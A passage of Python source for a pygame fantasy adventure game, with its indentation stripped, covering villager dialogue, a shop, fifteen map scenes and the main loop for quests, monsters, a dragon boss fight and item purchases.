self.sheet.set_clip(pg.Rect(126, 11, 58, 30))
self.frame = 0
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.left_states = {0: (0, 97, 97, 98), 1: (97, 97, 98, 98), 2: (195, 97, 94, 98)}
self.right_states = {0: (0, 195, 97, 97), 1: (97, 195, 98, 97), 2: (198, 195, 94, 97)}
self.up_states = {0: (3, 293, 94, 97), 1: (101, 292, 94, 97), 2: (198, 292, 94, 97)}
self.down_states = {0: (3, 0, 94, 97), 1: (101, 0, 94, 97), 2: (198, 0, 94, 97)}
self.direction = facing
self.movespeed = 1.5
self.direction = 'down'
self.health = 2.8
self.mode = mode
self.sound = dragonsound
def movement(self):
if self.mode == 2:
self.direction = 'left'
#Standing Villager
class FriendlySpriteOne(pg.sprite.Sprite):
def __init__(self):
self.groups = all_sprites, friendly_one
pg.sprite.Sprite.__init__(self, self.groups)
self.image = standingsprite
self.rect = self.image.get_rect()
self.rect.topleft = (495, 250)
self.msgtimer = 3.9
def handle_event(self, playersrect, events, girldir, playerquest):
for characterone in character:
if events.type == pg.MOUSEBUTTONDOWN and self.rect.colliderect(playersrect):
self.msgtimer = 3.9
if playerquest == 5:
message_display('I am so sorry...', 19, 600, black)
else:
message_display('Hey! Rumour has it there is something up north...', 17, 650, black)
elif self.rect.colliderect(playersrect):
self.msgtimer = 3.91
message_display('Click the mouse to talk!', 20, self.msgtimer, black)
if girldir == 'up':
self.image = standingspritetwo
else:
self.image = standingsprite
#Standing Villager Two
class FriendlySpriteFour(pg.sprite.Sprite):
def __init__(self, position):
self.groups = all_sprites, friendly_four
pg.sprite.Sprite.__init__(self, self.groups)
self.image = standertwo
self.rect = self.image.get_rect()
self.rect.topleft = position
self.msgtimer = 3.9
self.completed = False
self.convonum = 0
self.two = 0
self.upgrade = False
def handle_event(self, playersrect, events, playerquest):
for characterone in character:
if events.type == pg.MOUSEBUTTONDOWN and self.rect.colliderect(playersrect):
self.msgtimer = 3.9
if playerquest == 5:
message_display('Such a shame what happened to your son.', 17, 700, black)
elif self.completed == True and self.two == 1:
message_display('I am in your debt forever.', 19, 650, black)
elif self.completed == True:
self.two = 1
self.upgrade = True
message_display('Thanks! Here is a pair of boots to travel faster!', 16, 650, black)
upgradesound.play()
else:
if self.convonum == 0:
message_display('Please, I need your help urgently!', 18, 550, black)
self.convonum += 1
elif self.convonum == 1:
message_display('My brother is sick and needs a rare desert flower!', 17, 760, black)
self.convonum += 1
elif self.convonum == 2:
self.quest = True
message_display('If you succeed I will give you an award!', 17, 650, black)
self.convonum += 1
elif self.convonum == 3 and self.completed != True:
message_display('What are you doing? Please find the flower!', 17, 600, black)
elif self.rect.colliderect(playersrect):
self.msgtimer = 3.91
message_display('Click the mouse to talk!', 20, self.msgtimer, black)
#Shop Keeper
class Shop(pg.sprite.Sprite):
def __init__(self, position):
self.groups = all_sprites, shop_keeper
pg.sprite.Sprite.__init__(self, self.groups)
self.image = shopimg
self.rect = self.image.get_rect()
self.rect.topleft = position
self.msgtimer = 3.9
def handle_event(self, playersrect, events, playerquest):
for characterone in character:
if events.type == pg.MOUSEBUTTONDOWN and self.rect.colliderect(playersrect):
self.msgtimer = 3.9
message_display('I sell healing potions and shovels for good prices.', 17, 650, black)
elif self.rect.colliderect(playersrect):
self.msgtimer = 3.91
message_display('Click the mouse to talk!', 20, self.msgtimer, black)
#Map classes
class GameSceneOne(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapone)
class GameSceneTwo(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemaptwo)
class GameSceneThree(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapthree)
class GameSceneFour(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapfour)
class GameSceneFive(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapfive)
class GameSceneSix(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapsix)
class GameSceneSeven(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapseven)
class GameSceneEight(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapeight)
class GameSceneNine(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapnine)
class GameSceneTen(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapten)
class GameSceneEleven(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapeleven)
class GameSceneTwelve(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemaptwelve)
class GameSceneThirteen(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapthirteen)
class GameSceneFourteen(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapfourteen)
class GameSceneFifteen(SceneBase, Hero):
def __init__(self):
SceneBase.__init__(self)
def Render(self, screen, x, y):
displayBackground(tilemapfifteen)
#Main GAME LOOP
def game_loop(startx, starty, startone, starttwo, starting_scene):
global pause, controls
active_scene = starting_scene
x = startx
y = starty
player = Hero((x, y))
friendlymobtwo = FriendlySpriteTwo((startone, starttwo))
shop_owner = Shop((350, 460))
walker_two = FriendlySpriteThree((570, 500))
walker_two.update('left', player.rect)
standing_sprite_two = FriendlySpriteFour((320, 400))
new_flower = Flower((500, 500))
batone = Bat((400, 400), 'left')
battwo = Bat((240, 500), 'right')
batthree = Bat((700, 400), 'up')
slimeone = Slime((320, 320), 'down')
slimetwo = Slime((640, 160), 'down')
slimethree = Slime((650, 400), 'down')
slimefour = Slime((880, 580), 'down')
slimefive = Slime((400, 650), 'down')
deerone = Deer((500, 500), 'down')
deertwo = Deer((400, 500), 'down')
deerthree = Deer((600, 500), 'down')
wolfone = Wolf((500, 400), 'down')
wolftwo = Wolf((600, 400), 'down')
wolfthree = Wolf((500, 700), 'down')
wolffour = Wolf((540, 200), 'down')
scorpionone = Scorpion((430, 400), 'down')
scorpiontwo = Scorpion((400, 410), 'down')
scorpionthree = Scorpion((200, 400), 'down')
scorpionfour = Scorpion((400, 500), 'down')
dragonone = Dragon((600, 400), 'down', 1)
dragontwo = Startdragon((1150, 360), 'left', 2)
healthbar = Healthbar(player.health, (-28, 22))
dragonhealthbar = DragonHealthbar(dragonone.health, (824, 22))
boxofhealth = HealthBox((570, 175), 0)
potionone = HealthPotion((90, 232))
potiontwo = HealthPotion((123, 232))
potionthree = HealthPotion((172, 232))
potionfour = HealthPotion((203, 232))
new_shovel = Shovel((415, 225))
player.setLocation('town')
batplayed = 0
slimeplayed = 0
deerplayed = 0
dragonplayed = 0
wolfplayed = 0
scorpionplayed = 0
upgradepotential = True
message_timer = 0
runone, runtwo, runthree, runfour, runfive = 0, 0, 0, 0, 0
while active_scene != None:
#Slime death detection
if slimes.sprites() == []:
player.questlvl = 11
for event in pg.event.get():
if event.type == pg.QUIT:
quitgame()
active_scene.Terminate()
elif event.type == pg.KEYDOWN:
if event.key == pg.K_SPACE and player.questlvl > 7:
now = pg.time.get_ticks()
if now - player.last_shot > player.firespeed:
player.last_shot = now
magicsound.play()
player.shoot()
if event.key == pg.K_ESCAPE:
pause = True
game_pause(player.questlvl, player.wand, player.healthlvl, player.bootlvl)
if event.key == pg.K_TAB:
player.heal(healthbar.rect)
if event.key == pg.K_d:
if player.get_location() == 'southdesert' and player.collisionrect.colliderect(pg.Rect(960, 640, 60, 60)) == True and player.num_of_shovels > 0:
player.num_of_shovels -= 1
message_display('You found 50 coins!', 17, 550, black)
player.num_of_coins += 50
#Walls for intro
if player.questlvl <= 7 and player.get_location() == 'town':
if player.collisionrect.right > 1120:
player.collisionrect.right = 1120
player.rect.right = player.collisionrect.right
if player.collisionrect.left < 0:
player.collisionrect.left = 0
player.rect.left = player.collisionrect.left
if player.collisionrect.top - 35 < 0:
player.collisionrect.top = 35
player.rect.top = player.collisionrect.top - 35
if player.collisionrect.bottom > 880:
player.collisionrect.bottom = 880
player.rect.bottom = 880
pg.mixer.music.stop()
pg.mixer.music.load(songs[1])
pg.mixer.music.play(-1)
elif player.rect.top < 0 and player.get_location() == 'town':
active_scene.SwitchToScene(GameSceneTwo())
player.collisionrect.x = 505
player.collisionrect.y = 845
player.rect.x = player.collisionrect.x
player.rect.y = player.collisionrect.y - 35
player.setLocation('northriver')
pg.mixer.music.stop()
pg.mixer.music.load(songs[1])
pg.mixer.music.play(-1)
#Map switching detection
if player.rect.bottom > display_height and player.get_location() == 'northriver':
active_scene.SwitchToScene(GameSceneOne())
clouds.empty()
player.collisionrect.x = 505
player.rect.y = 0
player.rect.x = player.collisionrect.x
player.collisionrect.y = player.rect.y + 35
player.setLocation('town')
pg.mixer.music.stop()
pg.mixer.music.load(songs[0])
pg.mixer.music.play(-1)
if player.rect.right > display_width and player.get_location() == 'town':
active_scene.SwitchToScene(GameSceneThree())
clouds.empty()
player.collisionrect.x = 1
player.rect.x = player.collisionrect.x
player.setLocation('eastplains')
pg.mixer.music.stop()
pg.mixer.music.load(songs[2])
pg.mixer.music.play(-1)
if player.rect.left < 0 and player.get_location() == 'eastplains':
active_scene.SwitchToScene(GameSceneOne())
clouds.empty()
player.collisionrect.x = 1072
player.rect.x = player.collisionrect.x
player.setLocation('town')
pg.mixer.music.stop()
pg.mixer.music.load(songs[0])
pg.mixer.music.play(-1)
if player.rect.left < 0 and player.get_location() == 'town':
active_scene.SwitchToScene(GameSceneFive())
clouds.empty()
player.collisionrect.x = 1072
player.rect.x = player.collisionrect.x
player.setLocation('dragonone')
pg.mixer.music.stop()
pg.mixer.music.load(songs[3])
pg.mixer.music.play(-1)
if player.rect.right > 1120 and player.get_location() == 'dragonone':
active_scene.SwitchToScene(GameSceneOne())
clouds.empty()
player.collisionrect.x = 1
if player.collisionrect.y <= 560 and player.collisionrect.y >= 320:
pass
else:
player.collisionrect.y = 430
player.rect.y = player.collisionrect.y - 35
player.rect.x = player.collisionrect.x
player.setLocation('town')
pg.mixer.music.stop()
pg.mixer.music.load(songs[0])
pg.mixer.music.play(-1)
if player.rect.bottom > display_height and player.get_location() == 'town':
active_scene.SwitchToScene(GameSceneSix())
clouds.empty()
player.collisionrect.x = 505
player.rect.y = 0
player.rect.x = player.collisionrect.x
player.collisionrect.y = player.rect.y + 35
player.setLocation('desert')
pg.mixer.music.stop()
pg.mixer.music.load(songs[2])
pg.mixer.music.play(-1)
if player.collisionrect.top - 35 < 0 and player.get_location() == 'desert':
active_scene.SwitchToScene(GameSceneOne())
clouds.empty()
player.collisionrect.x = 505
player.collisionrect.y = 845
player.rect.x = player.collisionrect.x
player.rect.y = player.collisionrect.y - 35
player.setLocation('town')
pg.mixer.music.stop()
pg.mixer.music.load(songs[0])
pg.mixer.music.play(-1)
if player.collisionrect.left < 0 and player.get_location() == 'dragonone':
active_scene.SwitchToScene(GameSceneSeven())
clouds.empty()
player.collisionrect.x = 1072
player.rect.x = player.collisionrect.x
player.setLocation('dragonentrance')
if player.collisionrect.right > 1120 and player.get_location() == 'dragonentrance':
active_scene.SwitchToScene(GameSceneFive())
clouds.empty()
player.collisionrect.x = 1
player.rect.x = player.collisionrect.x
player.setLocation('dragonone')
if player.collisionrect.left < 0 and player.get_location() == 'dragonentrance':
active_scene.SwitchToScene(GameSceneEight())
clouds.empty()
player.collisionrect.x = 1072
player.rect.x = player.collisionrect.x
player.setLocation('dragoncave')
if player.rect.left < 0 and player.get_location() == 'farplains':
active_scene.SwitchToScene(GameSceneThree())
clouds.empty()
player.collisionrect.x = 1072
player.rect.x = player.collisionrect.x
player.setLocation('eastplains')
if player.collisionrect.right > 1120 and player.get_location() == 'eastplains':
active_scene.SwitchToScene(GameSceneNine())
clouds.empty()
player.collisionrect.x = 1
player.rect.x = player.collisionrect.x
player.setLocation('farplains')
if player.rect.left < 0 and player.get_location() == 'desert':
active_scene.SwitchToScene(GameSceneTen())
clouds.empty()
player.collisionrect.x = 1072
player.rect.x = player.collisionrect.x
player.setLocation('westdesert')
if player.collisionrect.right > 1120 and player.get_location() == 'westdesert':
active_scene.SwitchToScene(GameSceneSix())
clouds.empty()
player.collisionrect.x = 1
player.rect.x = player.collisionrect.x
player.setLocation('desert')
if player.collisionrect.right > 1120 and player.get_location() == 'desert':
active_scene.SwitchToScene(GameSceneEleven())
clouds.empty()
player.collisionrect.x = 1
player.rect.x = player.collisionrect.x
player.setLocation('eastdesert')
if player.rect.left < 0 and player.get_location() == 'eastdesert':
active_scene.SwitchToScene(GameSceneSix())
clouds.empty()
player.collisionrect.x = 1072
player.rect.x = player.collisionrect.x
player.setLocation('desert')
if player.rect.bottom > display_height and player.get_location() == 'desert':
active_scene.SwitchToScene(GameSceneTwelve())
clouds.empty()
player.rect.y = 0
player.collisionrect.y = player.rect.y + 35
player.setLocation('southdesert')
if player.collisionrect.top - 35 < 0 and player.get_location() == 'southdesert':
active_scene.SwitchToScene(GameSceneSix())
clouds.empty()
player.collisionrect.y = 845
player.rect.y = player.collisionrect.y - 35
player.setLocation('desert')
#Indoor / Outdoor Collision Detection
if pg.sprite.spritecollideany(player, doors) != None:
if player.collisionrect.colliderect(pg.Rect(160, 320, 80, 160)) == True and player.get_location() == 'town':
if player.questlvl == 5:
message_display('The door appears to be locked.', 18, 600, black)
else:
active_scene.SwitchToScene(GameSceneThirteen())
clouds.empty()
doorsound.play()
player.collisionrect.x = 260
player.rect.x = player.collisionrect.x
player.collisionrect.y = 550
player.rect.y = player.collisionrect.y - 35
player.setLocation('houseone')
message_display('Walk to the item you would like to purchase.', 16, 600, black)
if player.collisionrect.colliderect(pg.Rect(240, 480, 80, 160)) == True and player.get_location() == 'town':
active_scene.SwitchToScene(GameSceneFourteen())
clouds.empty()
doorsound.play()
player.collisionrect.x = 340
player.rect.x = player.collisionrect.x
player.collisionrect.y = 625
player.rect.y = player.collisionrect.y - 35
player.setLocation('housetwo')
if player.collisionrect.colliderect(pg.Rect(880, 560, 80, 160)) == True and player.get_location() == 'town':
active_scene.SwitchToScene(GameSceneFifteen())
clouds.empty()
doorsound.play()
player.collisionrect.x = 740
player.rect.x = player.collisionrect.x
player.collisionrect.y = 700
player.rect.y = player.collisionrect.y - 35
player.setLocation('housethree')
if player.get_location() == 'houseone' and player.collisionrect.y > 570:
active_scene.SwitchToScene(GameSceneOne())
clouds.empty()
player.collisionrect.x = 180
player.rect.x = player.collisionrect.x
player.collisionrect.y = 407
player.rect.y = player.collisionrect.y - 35
player.setLocation('town')
if player.get_location() == 'housetwo' and player.collisionrect.y > 645:
active_scene.SwitchToScene(GameSceneOne())
clouds.empty()
player.collisionrect.x = 262
player.rect.x = player.collisionrect.x
player.collisionrect.y = 560
player.rect.y = player.collisionrect.y - 35
player.setLocation('town')
if player.get_location() == 'housethree' and player.collisionrect.y > 725:
active_scene.SwitchToScene(GameSceneOne())
clouds.empty()
player.collisionrect.x = 900
player.rect.x = player.collisionrect.x
player.collisionrect.y = 750
player.rect.y = player.collisionrect.y - 35
player.setLocation('town')
#Desert Lost Warning(s)
if player.get_location() == 'southdesert':
if player.collisionrect.right > 1120:
player.collisionrect.right = 1120
player.rect.right = player.collisionrect.right
if player.collisionrect.left < 0:
player.collisionrect.left = 0
player.rect.left = player.collisionrect.left
if player.collisionrect.bottom > 880:
player.collisionrect.bottom = 880
player.rect.bottom = 880
if player.get_location() == 'eastdesert':
if player.collisionrect.right > 1120:
player.collisionrect.right = 1120
player.rect.right = player.collisionrect.right
if player.collisionrect.top - 35 < 0:
player.collisionrect.top = 35
player.rect.top = player.collisionrect.top - 35
if player.collisionrect.bottom > 880:
player.collisionrect.bottom = 880
player.rect.bottom = 880
if player.get_location() == 'westdesert':
if player.collisionrect.left < 0:
player.collisionrect.left = 0
player.rect.left = player.collisionrect.left
if player.collisionrect.top - 35 < 0:
player.collisionrect.top = 35
player.rect.top = player.collisionrect.top - 35
if player.collisionrect.bottom > 880:
player.collisionrect.bottom = 880
player.rect.bottom = 880
#Award for quest
if friendlymobtwo.completed == True:
player.firespeed = 150
player.wand = 1
#Son display
if player.get_location() == 'town':
GAMEDISPLAY.blit(son, (970, 640))
#Bossfight Walls
if player.get_location() == 'dragoncave':
if player.collisionrect.right > 1120:
player.collisionrect.right = 1120
player.rect.right = player.collisionrect.right
if player.collisionrect.left < 0:
player.collisionrect.left = 0
player.rect.left = player.collisionrect.left
if player.collisionrect.top - 35 < 0:
player.collisionrect.top = 35
player.rect.top = player.collisionrect.top - 35
if player.collisionrect.bottom > 880:
player.collisionrect.bottom = 880
player.rect.bottom = 880
#Staircase detection heart cave
if player.collisionrect.left < 50 and player.get_location() == 'northriver':
active_scene.SwitchToScene(GameSceneFour())
clouds.empty()
play_stairsound()
player.collisionrect.x = 1000
player.collisionrect.y = 500
player.rect.x = player.collisionrect.x
player.rect.y = player.collisionrect.y - 35
player.setLocation('heartcave')
if player.collisionrect.right > 1090 and player.get_location() == 'heartcave':
active_scene.SwitchToScene(GameSceneTwo())
play_stairsound()
player.collisionrect.x = 81
player.collisionrect.y = 500
player.rect.x = player.collisionrect.x
player.rect.y = player.collisionrect.y - 35
player.setLocation('northriver')
#Class in-game-loop operations
player.handle_event(event, player.direction)
active_scene.Render(GAMEDISPLAY, x, y)
active_scene = active_scene.next
coins.update(player.collisionrect)
coins.draw(GAMEDISPLAY)
bullets.update()
bullets.draw(GAMEDISPLAY)
fireballs.update()
fireballs.draw(GAMEDISPLAY)
#Brother display
if player.get_location() == 'housetwo':
GAMEDISPLAY.blit(standerbrother, (495, 340))
#Intro
starterdragon.draw(GAMEDISPLAY)
if player.questlvl == 0:
dragontwo.update('left')
dragontwo.movement()
if dragontwo.rect.x < 550 and dragontwo.rect.x > 540:
player.questlvl = 1
if player.questlvl == 1:
message_display('Dragon: This world will crack under my wraith!', 20, 700, black)
dragontwo.sound.play()
player.questlvl = 2
if player.questlvl == 2:
dragontwo.movespeed = 5
player.questlvl = 3
dragontwo.update('left')
dragontwo.movement()
if dragontwo.rect.right < 0 and player.questlvl == 3:
dragontwo.kill()
player.questlvl = 4
if player.questlvl == 4:
message_display('Explore the town!', 23, 660, black)
player.questlvl = 5
if player.get_location() == 'town':
GAMEDISPLAY.blit(son, (970, 640))
if player.questlvl == 5:
if player.collisionrect.left > 925 and player.collisionrect.top > 650 and player.collisionrect.bottom < 740:
message_display('You: My son! The dragon must have done this!', 17, 800, black)
for smo in smoke:
intro_images()
GAMEDISPLAY.blit(son, (970, 640))
GAMEDISPLAY.blit(smo, (855, 640))
GAMEDISPLAY.blit(firstpicture, (928, 640))
if smo == smoke[4] or smo == smoke[5]:
GAMEDISPLAY.blit(mage, (855, 640))
pg.display.update(pg.Rect(620, 580, 520, 140))
time.sleep(0.11)
if smo == smoke[5]:
player.questlvl = 6
if player.questlvl == 6:
intro_images()
more_images()
message_display('You: A mage! Can you revive him?', 21, 800, black)
intro_images()
more_images()
message_display('Mage: I can not. The dragon took your son;', 22, 800, black)
intro_images()
more_images()
message_display('Mage: It is your destiny to defeat him!', 24, 800, black)
intro_images()
more_images()
message_display('Mage: Take this wand. Avenge your son! (SPACE to fire)', 17, 800, black)
player.questlvl = 7
if player.questlvl == 7:
for smo in smoke:
intro_images()
GAMEDISPLAY.blit(son, (970, 640))
GAMEDISPLAY.blit(smo, (855, 640))
GAMEDISPLAY.blit(firstpicture, (928, 640))
pg.display.update(pg.Rect(620, 580, 520, 140))
time.sleep(0.11)
if smo == smoke[5]:
player.questlvl = 8
if player.questlvl == 8:
intro_images()
GAMEDISPLAY.blit(holdwand, (928, 640))
pg.display.update(pg.Rect(620, 580, 520, 140))
time.sleep(3)
displayBackground(tilemapone)
player.questlvl = 9
#Death
if healthbar.rect.right <= 0:
death()
if dragonhealthbar.rect.left >= 1120:
deathsound.play()
victory()
#Friendly Mob One
if player.get_location() == 'town' and player.questlvl > 4:
friendly_one.draw(GAMEDISPLAY)
FriendlySpriteOne().handle_event(player.collisionrect, event, friendlymobtwo.direction, player.questlvl)
#Friendly Mob Two
if player.get_location() == 'town' and player.questlvl > 4:
friendly_two.draw(GAMEDISPLAY)
friendlymobtwo.handle_event(friendlymobtwo.direction, player.collisionrect, event, player.questlvl, player.firespeed)
friendlymobtwo.update(friendlymobtwo.direction, player.collisionrect)
#Friendly Mob Three
if player.get_location() == 'town' and player.questlvl > 4:
friendly_three.draw(GAMEDISPLAY)
walker_two.handle_event(walker_two.direction, player.collisionrect, event, player.questlvl)
walker_two.update(walker_two.direction, player.collisionrect)
#Friendly Mob Four
if player.get_location() == 'housetwo' and player.questlvl > 4:
friendly_four.draw(GAMEDISPLAY)
standing_sprite_two.handle_event(player.collisionrect, event, player.questlvl)
#Shop keeper
if player.get_location() == 'houseone' and player.questlvl > 4:
shop_keeper.draw(GAMEDISPLAY)
shop_owner.handle_event(player.collisionrect, event, player.questlvl)
#Flower Operations
if player.get_location() == 'westdesert':
desert_flower.draw(GAMEDISPLAY)
if pg.sprite.groupcollide(character, desert_flower, False, True) != {}:
player.increase_flowers()
if player.num_of_flowers == 1:
standing_sprite_two.completed = True
if standing_sprite_two.upgrade == True:
player.movespeed = 8.4
player.bootlvl = 1
#Item Operations
if player.get_location() == 'houseone':
health_pots.draw(GAMEDISPLAY)
shovels.draw(GAMEDISPLAY)
if player.num_of_coins >= 6:
if runone == 0:
if pg.sprite.collide_rect(player, potionone) == True:
potionone.kill()
player.num_of_potions += 1
player.num_of_coins -= 6
runone = 1
if runtwo == 0:
if pg.sprite.collide_rect(player, potiontwo) == True:
potiontwo.kill()
player.num_of_potions += 1
player.num_of_coins -= 6
runtwo = 1
if runthree == 0:
if pg.sprite.collide_rect(player, potionthree) == True:
potionthree.kill()
player.num_of_potions += 1
player.num_of_coins -= 6
runthree = 1
if runfour == 0:
if pg.sprite.collide_rect(player, potionfour) == True:
potionfour.kill()
player.num_of_potions += 1
player.num_of_coins -= 6
runfour = 1
else:
if pg.sprite.groupcollide(character, health_pots, False, False) != {}:
message_display('You need {} more coins to pay for that!'.format(6 - player.num_of_coins), 20, 550, black)
if player.num_of_coins >= 20:
if runfive == 0:
if pg.sprite.collide_rect(player, new_shovel) == True:
new_shovel.kill()
player.num_of_shovels += 1
player.num_of_coins -= 20
runfive = 1
else:
if pg.sprite.groupcollide(character, shovels, False, False) != {}:
message_display('You need {} more coins to pay for that!'.format(20 - player.num_of_coins), 20, 550, black)
#Bats in north river
if player.get_location() == 'northriver':
bats.draw(GAMEDISPLAY)
batone.handle_event(event, batone.direction, player.collisionrect)
batone.update(batone.direction)
battwo.handle_event(event, battwo.direction, player.collisionrect)
battwo.update(battwo.direction)
batthree.handle_event(event, batthree.direction, player.collisionrect)
batthree.update(batthree.direction)
if bats.sprites() != [] and batplayed < 2:
batone.sound.play()
batplayed += 1
#Slimes in far plains
if player.get_location() == 'farplains':
slimes.draw(GAMEDISPLAY)
slimeone.handle_event(event, slimeone.direction, player.collisionrect)
slimeone.update(slimeone.direction)
slimetwo.handle_event(event, slimetwo.direction, player.collisionrect)
slimetwo.update(slimetwo.direction)
slimethree.handle_event(event, slimethree.direction, player.collisionrect)
slimethree.update(slimethree.direction)
slimefour.handle_event(event, slimefour.direction, player.collisionrect)
slimefour.update(slimefour.direction)
slimefive.handle_event(event, slimefive.direction, player.collisionrect)
slimefive.update(slimefive.direction)
if slimes.sprites() != [] and slimeplayed < 2:
slimeone.sound.play()
slimeplayed += 1
#Deer in west one
if player.get_location() == 'dragonone':
deers.draw(GAMEDISPLAY)
deerone.handle_event(event, deerone.direction, player.collisionrect)
deerone.update(deerone.direction)
deertwo.handle_event(event, deertwo.direction, player.collisionrect)
deertwo.update(deertwo.direction)
deerthree.handle_event(event, deerthree.direction, player.collisionrect)
deerthree.update(deerthree.direction)
if deers.sprites() != [] and deerplayed < 2:
deerone.sound.play()
deerplayed += 1
#Wolves in west two
if player.get_location() == 'dragonentrance':
wolves.draw(GAMEDISPLAY)
wolfone.handle_event(event, wolfone.direction, player.collisionrect)
wolfone.update(wolfone.direction)
wolftwo.handle_event(event, wolftwo.direction, player.collisionrect)
wolftwo.update(wolftwo.direction)
wolfthree.handle_event(event, wolfthree.direction, player.collisionrect)
wolfthree.update(wolfthree.direction)
wolffour.handle_event(event, wolffour.direction, player.collisionrect)
wolffour.update(wolffour.direction)
if wolves.sprites() != [] and wolfplayed < 2:
wolfone.sound.play()
wolfplayed += 1
#Scorpions in desert
if player.get_location() == 'desert':
scorpions.draw(GAMEDISPLAY)
scorpionone.handle_event(event, scorpionone.direction, player.collisionrect)
scorpionone.update(scorpionone.direction)
scorpiontwo.handle_event(event, scorpiontwo.direction, player.collisionrect)
scorpiontwo.update(scorpiontwo.direction)
scorpionthree.handle_event(event, scorpionthree.direction, player.collisionrect)
scorpionthree.update(scorpionthree.direction)
scorpionfour.handle_event(event, scorpionfour.direction, player.collisionrect)
scorpionfour.update(scorpionfour.direction)
if scorpions.sprites() != [] and scorpionplayed < 2:
scorpionone.sound.play()
scorpionplayed += 1
#Boss
if player.get_location() == 'dragoncave':
dragons.draw(GAMEDISPLAY)
dragonone.handle_event(event, dragonone.direction, player.collisionrect)
dragonone.update(dragonone.direction)
if dragonone.health > 0:
dragonone.fire(player.collisionrect)
dragonone.anger()
else:
fireballs.empty()
if dragons.sprites() == []:
victory()
if dragons.sprites() != [] and dragonplayed < 4:
dragonone.sound.play()
dragonplayed += 1
#Damage Dealer / Checker / Display
health.draw(GAMEDISPLAY)
if player.get_location() == 'dragoncave':
dragonhealth.draw(GAMEDISPLAY)
GAMEDISPLAY.blit(dragoncontainer, (812, 10))
if pg.sprite.groupcollide(dragons, bullets, False, False, collided = None):
dragonone.lower_health(7)
dragonhealthbar.lower(0.9)
if player.get_location() == 'heartcave':
healthbox.draw(GAMEDISPLAY)
if boxofhealth.rect.colliderect(player.collisionrect) == True and player.get_location() == 'heartcave':
boxofhealth.healthupgrade()
boxofhealth.mode = 1
if player.questlvl <= 11 and upgradepotential == True:
boxofhealth.kill()
healthbar.upgrade()
upgradesound.play()
player.healthlvl = 1
player.questlvl = 12
upgradepotential = False
if boxofhealth.mode == 0:
GAMEDISPLAY.blit(healthcontainer, (-28, 10))
elif boxofhealth.mode == 1:
GAMEDISPLAY.blit(healthcontainer, (0, 10))
player.max_health = 296
if player.get_location() == 'town':
pass
else:
if pg.sprite.groupcollide(character, fireballs, False, True, collided = None) and player.get_location() == 'dragoncave':
player.lower_health(0.8)
healthbar.lower(0.8)
elif pg.sprite.groupcollide(character, bats, False, False, collided = None) and player.get_location() == 'northriver':
player.lower_health(0.4)
healthbar.lower(0.4)
elif pg.sprite.groupcollide(character, slimes, False, False, collided = None) and player.get_location() == 'farplains':
player.lower_health(0.35)
healthbar.lower(0.35)
elif pg.sprite.groupcollide(character, deers, False, False, collided = None) and player.get_location() == 'dragonone':
player.lower_health(0.5)
healthbar.lower(0.5)
elif pg.sprite.groupcollide(character, wolves, False, False, collided = None) and player.get_location() == 'dragonentrance':
player.lower_health(0.75)
healthbar.lower(0.75)
elif pg.sprite.groupcollide(character, scorpions, False, False, collided = None) and player.get_location() == 'desert':
player.lower_health(0.42)
healthbar.lower(0.42)
if pg.sprite.groupcollide(character, dragons, False, False, collided = None) and player.get_location() == 'dragoncave':
player.lower_health(1)
healthbar.lower(1)
#Items Display
GAMEDISPLAY.blit(coin_still, (335, 10))
TextSurf, TextRect = text_objects(' x{}'.format(player.num_of_coins), mediumText, cream)
TextRect.center = (410, 28)
GAMEDISPLAY.blit(TextSurf, TextRect)
GAMEDISPLAY.blit(potion_still, (500, 10))
TextSurf, TextRect = text_objects(' x{}'.format(player.num_of_potions), mediumText, cream)
TextRect.center = (575, 28)
GAMEDISPLAY.blit(TextSurf, TextRect)
GAMEDISPLAY.blit(shovelimg, (665, 10))
TextSurf, TextRect = text_objects(' x{}'.format(player.num_of_shovels), mediumText, cream)
TextRect.center = (740, 28)
GAMEDISPLAY.blit(TextSurf, TextRect)
#Player Display
GAMEDISPLAY.blit(player.image, player.rect)
clouds.draw(GAMEDISPLAY)
if len(clouds.sprites()) < 1:
if player.get_location() == 'town' or player.get_location() == 'northriver' or player.get_location() == 'eastplains' or player.get_location() == 'farplains':
clouds.empty()
new_cloud = Cloud((-500, random.randint(1,800)), random.choice(lclouds))
newtwo_cloud = Cloud((-1000, random.randint(1,800)), random.choice(lclouds))
newthree_cloud = Cloud((-800, random.randint(1,800)), random.choice(lclouds))
elif player.get_location() == 'desert' or player.get_location() == 'eastdesert' or player.get_location() == 'westdesert' or player.get_location() == 'southdesert':
clouds.empty()
new_cloud = Cloud((-500, random.randint(1,800)), random.choice(dclouds))
elif player.get_location() == 'dragonone' or player.get_location() == 'dragonentrance' or player.get_location() == 'dragoncave':
clouds.empty()
new_cloud = Cloud((-450, random.randint(1,800)), random.choice(sclouds))
newtwo_cloud = Cloud((-700, random.randint(1,800)), random.choice(lclouds))
newthree_cloud = Cloud((-500, random.randint(1,800)), random.choice(lclouds))
newfour_cloud = Cloud((-900, random.randint(1,800)), random.choice(lclouds))
newfive_cloud = Cloud((-550, random.randint(1,800)), random.choice(lclouds))
new_cloud.update()
newtwo_cloud.update()
newthree_cloud.update()
